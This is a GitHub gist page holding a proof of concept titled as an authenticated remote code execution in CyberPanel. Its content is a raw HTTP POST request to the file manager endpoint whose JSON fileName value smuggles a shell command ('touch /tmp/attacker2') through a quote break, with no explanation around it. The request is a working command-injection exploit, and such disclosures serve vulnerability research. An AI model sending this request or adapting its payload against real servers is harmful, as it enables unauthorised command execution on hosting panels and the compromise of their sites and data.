Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

@numanturle

numanturle/CyberPanel - Authenticated Remote Code Execution - 2.md

Last active January 9, 2023 21:19
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save numanturle/dc9582fe755caa4e1feb6161cf3766d2 to your computer and use it in GitHub Desktop.
Save numanturle/dc9582fe755caa4e1feb6161cf3766d2 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
CyberPanel - Authenticated Remote Code Execution - 2.md 
POST /filemanager/controller HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 141
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0 
Content-Type: application/json;charset=UTF-8
Origin: https://HOST:8090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://HOST:8090/websites/listCron
Accept-Encoding: gzip, deflate
Accept-Language: en,tr-TR;q=0.9,tr;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Cookie: csrftoken=MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ; django_language=tr; sessionid=zl41ugsc1evv58eut8xmq8vk2eb0vjze
sec-gpc: 1

{"fileName":"/home/attacker.com/numan.php';touch '/tmp/attacker2","method":"createNewFile","domainRandomSeed":"","domainName":"attacker.com"}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment